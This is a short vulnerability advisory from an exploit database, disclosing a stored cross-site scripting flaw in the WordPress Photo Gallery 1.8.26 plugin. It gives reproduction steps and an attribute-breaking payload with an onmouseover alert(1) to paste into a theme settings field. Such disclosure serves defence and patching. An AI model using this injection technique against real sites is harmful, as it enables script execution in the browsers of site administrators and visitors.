WordPress Photo Gallery 1.8.26 Cross Site Scripting

2024.07.10
Credit: tmrswrr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Wordpress Photo Gallery Version 1.8.26 Stored XSS # Date: 2024-07-03 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://10web.io/plugins/wordpress-photo-gallery/ # Version 1.8.26 ### Steps to Execute the Payload: 1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 2. Write Distance between pictures place your payload**: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3` 3. Click Update 4. You will see the payload executed


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top